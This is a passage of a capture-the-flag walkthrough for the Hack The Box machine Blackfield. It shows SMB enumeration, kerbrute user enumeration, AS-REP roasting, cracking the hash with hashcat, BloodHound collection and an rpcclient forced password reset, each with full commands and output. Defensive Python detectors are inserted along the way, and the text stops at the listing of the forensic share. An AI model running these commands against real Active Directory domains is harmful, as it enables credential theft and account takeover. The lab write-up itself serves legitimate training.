Blackfield-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: SMB directory names used as user IDs, kerbrute, AS-REP roasting, LDAP enumeration, BloodHound, changing a user's password with rpcclient, the lsass.zip dump, decrypting it with pypykatz, SeBackupPrivilege, Backup Operators, backing up the SAM, impacket-secretsdump, ntds.dit, volume shadow copies

Reference: https://0xdf.gitlab.io/2020/10/03/htb-blackfield.html#smb---tcp-445

Reference: https://github.com/darshannn10/HackTheBox/blob/main/Windows%20Boxes/BlackField/BlackField.md

0x01 Getting user access

1. Box description:

Blackfield is a hard Windows machine featuring Windows and Active Directory misconfigurations. Anonymous/guest access to an SMB share is used to enumerate users. Once a user with Kerberos pre-authentication disabled is found, we can perform an ASREPRoasting attack. This lets us retrieve a hash of the encrypted material in the AS-REP, which can be brute-forced offline to recover the plaintext password. With this user we can access an SMB share containing forensic artifacts, including an lsass process dump. It contains the username and password of a user with WinRM privileges who is also a member of the Backup Operators group. The privileges granted by this group are used to dump the Active Directory database and retrieve the hash of the primary domain administrator.

2. Target IP address: 10.10.10.192

3. Open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.192
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 06:06 CST
Nmap scan report for 10.10.10.192
Host is up (0.32s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
5985/tcp open wsman

Nmap done: 1 IP address (1 host up) scanned in 22.58 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
53,135,139,445,593,5985,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,135,139,445,593,5985 -sC -sV --min-rate=10000 10.10.10.192
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 06:08 CST
Nmap scan report for 10.10.10.192
Host is up (0.088s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp filtered netbios-ssn
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-05-15T21:04:22
|_ start_date: N/A
|_clock-skew: -1h04m44s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.13 seconds

4. Not many ports are open; let's look at the SMB service first

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.10.192 -u null

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.10.192:445 Name: 10.10.10.192 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share
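As an added example (my own code, not part of this writeup or of smbmap itself), here is a small Python parser for the share table smbmap prints, written from the auditing side: it reports which shares a null session can reach at all, which are writable, and, given a second listing taken with credentials, which shares those credentials newly unlocked. The two listings below are the null-session output from this page and the later output for the support account, embedded inline as constructed text; the whitespace-separated column layout shown on this page is assumed.

```python
import re

# One share row: name, access level, optional comment, using the access
# strings smbmap prints. Banner, header and separator lines will not match.
ROW = re.compile(
    r"^(?P<share>\S+)\s+(?P<access>NO ACCESS|READ ONLY|WRITE ONLY|READ, WRITE)\s*(?P<comment>.*)$"
)

# Constructed sample: the null-session listing from this page, whitespace-collapsed.
NULL_SESSION = """\
[+] IP: 10.10.10.192:445 Name: 10.10.10.192 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share
"""

# Constructed sample: the same host listed later with the support account.
SUPPORT_SESSION = """\
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share
"""


def parse_smbmap(text):
    """Return {share: (access, comment)} for every share row in smbmap output."""
    shares = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            shares[m["share"]] = (m["access"], m["comment"].strip())
    return shares


def reachable(shares, ignore=()):
    """Shares with any access other than NO ACCESS, in listing order.
    `ignore` lets you drop shares you consider expected (e.g. IPC$)."""
    return [s for s, (access, _) in shares.items()
            if access != "NO ACCESS" and s not in ignore]


def writable(shares):
    """Shares the session can write to; these are the higher-risk finding."""
    return [s for s, (access, _) in shares.items() if "WRITE" in access]


def newly_unlocked(before, after):
    """Shares the second listing can access but the first could not: what a
    given set of credentials adds over an anonymous session."""
    return [s for s in after if s in before
            and before[s][0] == "NO ACCESS" and after[s][0] != "NO ACCESS"]
```

Running `reachable(parse_smbmap(NULL_SESSION))` on the page's null-session listing gives `IPC$` and `profiles$`, which is the anonymous exposure that made the user enumeration in the next steps possible.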

5. Enumerating the profiles$ share reveals a large number of empty directories; I'll just save the directory names

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -N //10.10.10.192/profiles$ -c "recurse; ls"
. D 0 Thu Jun 4 00:47:12 2020
.. D 0 Thu Jun 4 00:47:12 2020
AAlleni D 0 Thu Jun 4 00:47:11 2020
ABarteski D 0 Thu Jun 4 00:47:11 2020
ABekesz D 0 Thu Jun 4 00:47:11 2020
ABenzies D 0 Thu Jun 4 00:47:11 2020
ABiemiller D 0 Thu Jun 4 00:47:11 2020
AChampken D 0 Thu Jun 4 00:47:11 2020
ACheretei D 0 Thu Jun 4 00:47:11 2020
ACsonaki D 0 Thu Jun 4 00:47:11 2020
AHigchens D 0 Thu Jun 4 00:47:11 2020
AJaquemai D 0 Thu Jun 4 00:47:11 2020
AKlado D 0 Thu Jun 4 00:47:11 2020
AKoffenburger D 0 Thu Jun 4 00:47:11 2020
AKollolli D 0 Thu Jun 4 00:47:11 2020
....................

6. Save the listing above locally and use a regex to keep only the leading directory name; I had an AI help me with this

┌──(kali㉿offsec)-[~/Desktop]
└─$ touch dirname.txt

awk '{print $1}' dirname.txt > name.txt

┌──(kali㉿offsec)-[~/Desktop]
└─$ awk '{print $1}' dirname.txt > name.txt

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat name.txt
AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
......
ZMiick
ZScozzari
ZTimofeeff
ZWausik

7. After adding a hosts entry locally, first verify which users exist, then start the AS-REP roasting attack

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.192 blackfield.local" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.192 blackfield.local
┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ ./kerbrute userenum -d blackfield.local --dc 10.10.10.192 ../name.txt

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (n/a) - 05/16/24 - Ronnie Flathers @ropnop

2024/05/16 06:41:41 > Using KDC(s):
2024/05/16 06:41:41 > 10.10.10.192:88

2024/05/16 06:42:16 > [+] VALID USERNAME: audit2020@blackfield.local
2024/05/16 06:44:21 > [+] VALID USERNAME: support@blackfield.local
2024/05/16 06:44:22 > [+] VALID USERNAME: svc_backup@blackfield.local
2024/05/16 06:44:52 > Done! Tested 314 usernames (3 valid) in 190.277 seconds

8. Only 3 users exist; let's try the AS-REP roasting attack

┌──(kali㉿offsec)-[~/Desktop]
└─$ touch domainname.txt

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat domainname.txt
audit2020
support
svc_backup

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-GetNPUsers -no-pass -usersfile domainname.txt blackfield.local/ -dc-ip 10.10.10.192
Impacket v0.11.0 - Copyright 2023 Fortra

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:aace551cda958e73cc9686be42e2d6af$17abd5425f2bc590d38fee71e10a20d1ad9fdb27a8bd6075ac6798554b0b66feec63ae99fca48b126ab68e3377302c0631247e639ee58bfb8fd00b9d5e1d118eee13ecf372831a608b78707655de97ae6d181319c817be22394f2e95ab98cb852886286eebc0b249375bd78ebebfacadd490019e6a52fe8f57bc958a84bd91b32f33d5a9eeb4f7d07622ddee170b3d35e745d2d697db248fb741ae176574d4e2a68cdf522484ec5156e2031cc15afdb95eff7f01930d34d141fcf6c163581034d5849e1613dc86143a1e193eb62acb2cecc6b0f5b2e283802c89ff567c558bd5cb64cce115a63c8a860ef2da0aa9eb78a08013d4
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
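As an added defender-side example (my own code, not part of this writeup or of the tools it uses), the following Python covers the two steps above from the detection side: the `roastable_accounts` check flags accounts whose userAccountControl has DONT_REQ_PREAUTH set, which is the condition GetNPUsers looks for; `asrep_roast_alerts` flags TGT requests (security event 4768) that succeeded without pre-authentication, which is what the AS-REP obtained for `support` looks like in the DC's log; and `userenum_alerts` counts 4768 failures with status 0x6 (unknown principal) per source IP, which is the footprint of the kerbrute run in step 7. The account values and log records are constructed samples in a flattened key=value form, not data from the box.

```python
import re

# userAccountControl bits (Microsoft-documented values).
DONT_REQ_PREAUTH = 0x400000   # "Do not require Kerberos preauthentication"
ACCOUNTDISABLE = 0x0002


def roastable_accounts(accounts):
    """Enabled accounts whose userAccountControl has DONT_REQ_PREAUTH set.
    `accounts` is an iterable of (sAMAccountName, userAccountControl) pairs,
    e.g. from an LDAP export; this is the condition GetNPUsers looks for."""
    return [name for name, uac in accounts
            if (uac & DONT_REQ_PREAUTH) and not (uac & ACCOUNTDISABLE)]


# Constructed sample values (hypothetical, not taken from the box).
SAMPLE_ACCOUNTS = [
    ("audit2020", 0x10200),     # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("support", 0x410200),      # same, plus DONT_REQ_PREAUTH -> roastable
    ("svc_backup", 0x10200),
    ("old_svc", 0x410202),      # DONT_REQ_PREAUTH but ACCOUNTDISABLE -> ignore
]

# Constructed security-log records of event 4768 ("A Kerberos authentication
# ticket (TGT) was requested"), flattened to key=value for this example.
# PreAuthType 0 = no pre-auth; TicketEncryptionType 0x17 = RC4-HMAC;
# Status 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN (the requested user does not exist).
SAMPLE_4768 = """\
EventID=4768 TargetUserName=audit2020 IpAddress=10.10.14.5 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0
EventID=4768 TargetUserName=support IpAddress=10.10.14.5 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
EventID=4768 TargetUserName=svc_backup IpAddress=10.10.14.5 PreAuthType=2 TicketEncryptionType=0x17 Status=0x0
EventID=4768 TargetUserName=aalleni IpAddress=10.10.14.5 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
EventID=4768 TargetUserName=abarteski IpAddress=10.10.14.5 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
EventID=4768 TargetUserName=abekesz IpAddress=10.10.14.5 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
EventID=4768 TargetUserName=DC01$ IpAddress=10.10.10.192 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0
"""

KV = re.compile(r"(\w+)=(\S+)")


def parse_events(text):
    """Turn each non-empty key=value line into a dict."""
    return [dict(KV.findall(line)) for line in text.splitlines() if line.strip()]


def asrep_roast_alerts(text):
    """Successful TGT requests issued without pre-authentication.
    Returns (user, source IP, encryption type); RC4 (0x17) is the classic
    GetNPUsers signature, since it asks for an etype-23 AS-REP by default."""
    return [(ev["TargetUserName"], ev["IpAddress"], ev["TicketEncryptionType"])
            for ev in parse_events(text)
            if ev.get("EventID") == "4768"
            and ev.get("PreAuthType") == "0"
            and ev.get("Status") == "0x0"]


def userenum_alerts(text, threshold=3):
    """Source IPs that produced at least `threshold` TGT requests for unknown
    principals (Status 0x6): many of these from one host is username guessing."""
    counts = {}
    for ev in parse_events(text):
        if ev.get("EventID") == "4768" and ev.get("Status") == "0x6":
            counts[ev["IpAddress"]] = counts.get(ev["IpAddress"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

The fix on the directory side is simply clearing the pre-authentication flag on `support`; the log rules are what tells you it was exercised before that happened. In a real environment the threshold for `userenum_alerts` would be far higher than 3 and tuned against the noise of mistyped logons.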

9. Crack the hash we obtained

┌──(kali㉿offsec)-[~/Desktop]
└─$ touch hash

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat hash
$krb5asrep$23$support@BLACKFIELD.LOCAL:aace551cda958e73cc9686be42e2d6af$17abd5425f2bc590d38fee71e10a20d1ad9fdb27a8bd6075ac6798554b0b66feec63ae99fca48b126ab68e3377302c0631247e639ee58bfb8fd00b9d5e1d118eee13ecf372831a608b78707655de97ae6d181319c817be22394f2e95ab98cb852886286eebc0b249375bd78ebebfacadd490019e6a52fe8f57bc958a84bd91b32f33d5a9eeb4f7d07622ddee170b3d35e745d2d697db248fb741ae176574d4e2a68cdf522484ec5156e2031cc15afdb95eff7f01930d34d141fcf6c163581034d5849e1613dc86143a1e193eb62acb2cecc6b0f5b2e283802c89ff567c558bd5cb64cce115a63c8a860ef2da0aa9eb78a08013d4

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
28800 | Kerberos 5, etype 17, DB | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
28900 | Kerberos 5, etype 18, DB | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 18200 ./hash /usr/share/wordlists/rockyou.txt
[sudo] kali 的密码:
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

$krb5asrep$23$support@BLACKFIELD.LOCAL:aace551cda958e73cc9686be42e2d6af$17abd5425f2bc590d38fee71e10a20d1ad9fdb27a8bd6075ac6798554b0b66feec63ae99fca48b126ab68e3377302c0631247e639ee58bfb8fd00b9d5e1d118eee13ecf372831a608b78707655de97ae6d181319c817be22394f2e95ab98cb852886286eebc0b249375bd78ebebfacadd490019e6a52fe8f57bc958a84bd91b32f33d5a9eeb4f7d07622ddee170b3d35e745d2d697db248fb741ae176574d4e2a68cdf522484ec5156e2031cc15afdb95eff7f01930d34d141fcf6c163581034d5849e1613dc86143a1e193eb62acb2cecc6b0f5b2e283802c89ff567c558bd5cb64cce115a63c8a860ef2da0aa9eb78a08013d4:#00^BlackKnight

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:aace551cda95...8013d4
Time.Started.....: Thu May 16 06:57:17 2024 (8 secs)
Time.Estimated...: Thu May 16 06:57:25 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1821.1 kH/s (0.46ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14336000/14344385 (99.94%)
Rejected.........: 0/14336000 (0.00%)
Restore.Point....: 14334976/14344385 (99.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: #1Fan465 -> #!hrvert
Hardware.Mon.#1..: Util: 80%

Started: Thu May 16 06:57:16 2024
Stopped: Thu May 16 06:57:27 2024

10. Check whether this account has WinRM and SMB access

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\support:#00^BlackKnight

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight

11. Then just check the SMB share permissions

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight'

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.10.192:445 Name: blackfield.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share

12. Hmm, I'll come back to that; first use bloodhound-python to look at the domain permissions

┌──(kali㉿offsec)-[~/Desktop]
└─$ bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192 --zip
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.blackfield.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 00M 33S
INFO: Compressing output into 20240516070530_bloodhound.zip

The user SUPPORT@BLACKFIELD.LOCAL has the capability to change the user AUDIT2020@BLACKFIELD.LOCAL's password without knowing that user's current password.

Use Samba's net tool to change the user's password. Credentials can be supplied in plaintext, or prompted for interactively if omitted from the command line. If the new password is omitted from the command line, you will be prompted for it.

net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"

Pass-the-hash can also be done here with the pth-toolkit's net tool. If the LM hash is unknown, it must be replaced with ffffffffff.

pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"

Now that you know the target user's plaintext password, you can start a new agent as that user, use the user's credentials with PowerView's ACL abuse functions, or even RDP to a system the target user can access. For more ideas and information, see the References tab.

13. Following that hint, change this user's password

┌──(kali㉿offsec)-[~/Desktop]
└─$ rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192 -c 'setuserinfo2 audit2020 23 "Admin@123"'
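The BloodHound edge above and the rpcclient call that exercises it are both visible to a defender, and as an added example (my own code, not from this writeup or from BloodHound) the Python below shows the two places to look. `unexpected_reset_rights` scans the ACEs on a user object for the User-Force-Change-Password extended right held by anyone outside an expected set of trustees, which is the ACL misconfiguration BloodHound reported; `reset_alerts` runs over security event 4724 ("An attempt was made to reset an account's password"), which the setuserinfo2 call produces on the DC. The ACE tuples, the expected trustee list and the log lines are constructed samples in a simplified form, not data from the box.

```python
import re

# rightsGuid of the "User-Force-Change-Password" extended right (Microsoft-documented).
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"

# Trustees expected to hold reset rights over ordinary users in this hypothetical
# domain; adjust to the real delegation model.
EXPECTED_TRUSTEES = frozenset({
    "BLACKFIELD\\Domain Admins", "NT AUTHORITY\\SYSTEM", "BLACKFIELD\\Helpdesk",
})

# Constructed ACEs on the audit2020 user object: (trustee, rights, object type GUID).
# "CR" is a control-access right whose meaning is given by the object type GUID.
SAMPLE_ACES = [
    ("BLACKFIELD\\Domain Admins", "CR", FORCE_CHANGE_PASSWORD),
    ("NT AUTHORITY\\SYSTEM", "GA", None),
    ("BLACKFIELD\\support", "CR", FORCE_CHANGE_PASSWORD),   # the edge BloodHound reported
    ("BLACKFIELD\\support", "RP", None),                    # read-property only
]


def unexpected_reset_rights(aces, expected=EXPECTED_TRUSTEES):
    """Trustees holding User-Force-Change-Password that are not on the expected list."""
    return sorted({trustee for trustee, rights, guid in aces
                   if rights == "CR" and guid
                   and guid.lower() == FORCE_CHANGE_PASSWORD
                   and trustee not in expected})


# Constructed security-log records of event 4724, flattened to key=value.
SAMPLE_4724 = """\
EventID=4724 SubjectUserName=jhelpdesk TargetUserName=aalleni Status=0x0
EventID=4724 SubjectUserName=support TargetUserName=audit2020 Status=0x0
"""

KV = re.compile(r"(\w+)=(\S+)")


def reset_alerts(text, allowed_resetters=frozenset({"jhelpdesk"})):
    """(subject, target) pairs for password resets performed by an account
    outside the allowed set of helpdesk/admin identities."""
    alerts = []
    for line in text.splitlines():
        ev = dict(KV.findall(line))
        if ev.get("EventID") == "4724" and ev.get("SubjectUserName") not in allowed_resetters:
            alerts.append((ev["SubjectUserName"], ev["TargetUserName"]))
    return alerts
```

A reset of a service or audit account by an ordinary user, as `reset_alerts` surfaces here, is worth an immediate look even when the reset itself succeeded: it locks the legitimate owner out and is a strong sign that the account is being taken over rather than serviced.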

14. See what access this account has

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.192 -u audit2020 -p 'Admin@123'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Admin@123

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.192 -u audit2020 -p 'Admin@123'
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\audit2020:Admin@123

15. Still only SMB access, so check the SMB share permissions

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.10.192 -u audit2020 -p 'Admin@123'

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.10.192:445 Name: blackfield.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.192 -u audit2020 -p 'Admin@123' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Admin@123
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share

16. List the SMB share contents

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U audit2020%'Admin@123' //10.10.10.192/forensic -c "recurse; ls"
. D 0 Sun Feb 23 21:03:16 2020
.. D 0 Sun Feb 23 21:03:16 2020
commands_output D 0 Mon Feb 24 02:14:37 2020
memory_analysis D 0 Fri May 29 04:28:33 2020
tools D 0 Sun Feb 23 21:39:08 2020

